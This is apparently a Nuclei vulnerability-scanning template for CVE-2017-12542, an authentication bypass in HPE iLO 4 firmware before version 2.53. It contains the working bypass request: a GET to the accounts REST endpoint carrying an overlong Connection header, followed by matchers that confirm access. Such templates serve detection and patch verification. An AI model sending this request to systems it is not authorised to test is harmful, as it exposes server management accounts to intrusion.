nuclei-templates/http/cves/2017/CVE-2017-12542.yaml

54 lines
1.8 KiB
YAML

id: CVE-2017-12542
info:
name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass
author: pikpikcu
severity: critical
description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.
impact: |
Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system.
remediation: |
Upgrade HPE Integrated Lights-out 4 (ILO4) to version 2.53 or later to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/44005
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542
- https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
- https://www.exploit-db.com/exploits/44005/
- http://www.securitytracker.com/id/1039222
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2017-12542
epss-score: 0.97224
epss-percentile: 0.99822
cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: hp
product: integrated_lights-out_4_firmware
tags: cve,cve2017,ilo4,hpe,auth-bypass,edb,hp
http:
- method: GET
path:
- "{{BaseURL}}/rest/v1/AccountService/Accounts"
headers:
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
matchers-condition: and
matchers:
- type: word
part: body
words:
- "iLO User"
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a0047304502206f44ac0f4d283c3274421cf7602fe089c97a4031c30a643c870eccb4114bf13e022100929a4cbef7545c9c9dadba9a770a841a2587fad0d188ebffff79a171fcb9cc3b:922c64590222798bb761d5b6d8e72950